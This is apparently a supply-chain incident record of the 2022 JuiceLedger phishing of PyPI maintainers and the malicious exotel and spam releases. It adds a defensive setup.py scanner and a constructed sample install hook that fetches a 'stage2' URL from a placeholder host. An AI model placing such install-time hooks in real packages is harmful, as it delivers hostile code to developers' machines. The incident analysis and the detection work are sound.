JuiceLedger phished PyPI maintainers
JuiceLedger phished PyPI maintainers and published malicious releases under real package names. The known legitimate-package compromises were exotel 0.1.6 and spam 2.0.2 and 4.0.2.
Story
The JuiceLedger PyPI incident began with a direct attack on maintainers rather than on the registry itself. Package owners received PyPI-themed phishing mail that claimed their projects needed validation. The login page was false; the credentials entered into it were real.
With those credentials, the attackers published malicious releases under legitimate package names. PyPI identified exotel 0.1.6 and spam 2.0.2 and 4.0.2 as poisoned releases, while also removing hundreds of typosquats that used the same install-time pattern but sit outside this dataset's scope.
The package payloads used setup-time execution as the first step. Installation collected host and environment details, contacted attacker-controlled infrastructure, and pulled a larger trojan onto developer workstations or CI runners. The useful moment for the attacker was not application runtime; it was the routine act of installing a package.
That is why this campaign remains a clean example of account compromise as supply-chain compromise. The registry did not need to be broken, and users did not need to mistype a package name. A maintainer account was enough to make trusted package coordinates deliver hostile code.
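As an added illustration of the install-time pattern described above (example code written for this page, not part of the source record or of the exotel or spam projects): a small Python AST scanner that flags a setup.py which subclasses a setuptools command, registers cmdclass hooks, or reaches for network, process and exec primitives. The indicator lists, both sample setup.py strings and the example.invalid URL are constructed for the example.

```python
import ast

# Added example (not from the incident record): flag the install-time-execution
# indicators described above in a sdist's setup.py before pip runs it.
NETWORK_OR_EXEC_MODULES = {"subprocess", "urllib", "requests", "socket", "ctypes", "base64"}
DANGEROUS_CALLS = {"exec", "eval", "system", "popen", "Popen", "urlopen", "check_output", "check_call", "b64decode"}
SETUPTOOLS_COMMANDS = {"install", "develop", "egg_info", "build_py"}

def _name_of(node: ast.expr) -> str:
    """Bare identifier behind a call or base class: exec -> exec, os.system -> system."""
    return getattr(node, "id", "") or getattr(node, "attr", "")

def scan_setup_py(source: str) -> list[str]:
    """Return line-ordered findings; an empty list means no indicator was seen."""
    findings: list[tuple[int, str]] = []
    for node in ast.walk(ast.parse(source)):
        roots = set()
        if isinstance(node, ast.Import):
            roots = {alias.name.split(".")[0] for alias in node.names}
        elif isinstance(node, ast.ImportFrom):
            roots = {(node.module or "").split(".")[0]}
        for root in roots & NETWORK_OR_EXEC_MODULES:
            findings.append((node.lineno, f"line {node.lineno}: imports {root}"))
        if isinstance(node, ast.ClassDef):  # subclassing a setuptools command is the hook
            for base in node.bases:
                if _name_of(base) in SETUPTOOLS_COMMANDS:
                    findings.append((node.lineno, f"line {node.lineno}: class {node.name} overrides the {_name_of(base)} command"))
        if isinstance(node, ast.Call):
            target = _name_of(node.func)
            if target in DANGEROUS_CALLS:
                findings.append((node.lineno, f"line {node.lineno}: calls {target}()"))
            if target == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append((node.lineno, f"line {node.lineno}: setup() registers cmdclass hooks"))
    return [msg for _, msg in sorted(findings)]

# Constructed samples (placeholder URL, no payload): a routine setup.py and one that
# hooks the install command and touches the network while the package installs.
BENIGN_SETUP = 'from setuptools import setup\nsetup(name="demo", version="1.0.0")\n'
SUSPICIOUS_SETUP = """\
import urllib.request
from setuptools import setup
from setuptools.command.install import install

class Hooked(install):
    def run(self):
        urllib.request.urlopen("https://example.invalid/stage2")
        install.run(self)
setup(name="demo", version="1.0.1", cmdclass={"install": Hooked})
"""
```

Run it over an sdist's setup.py before installing, and pair it with `pip install --only-binary=:all:` so that setup.py is never executed where a wheel is available.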
Linked Attacks
2022
JuiceLedger used phished PyPI credentials to publish malicious spam 2.0.2 and 4.0.2. The releases collected environment data and ran a downloaded trojan at install time.
JuiceLedger used phished PyPI credentials to publish malicious exotel 0.1.6. The release collected environment data and ran a downloaded trojan at install time.
Campaign Context
- Actor: JuiceLedger
- Attribution: Group
- Cause: Unknown
Affected Packages
External References
- PyPI packages hijacked after developers fall for phishing emails (bleepingcomputer.com)
- First Known Phishing Attack Against PyPi Users (checkmarx.com)
- PyPI Phishing Campaign | JuiceLedger Threat Actor Pivots From Fake Apps to Supply Chain Attacks (sentinelone.com)
- `exotel` project on PyPI compromised, malicious release made (github.com)
- `spam` project on PyPI compromised, malicious releases made (github.com)
Source record: oss/campaigns/juiceledger-pypi-phishing-2022/meta.yaml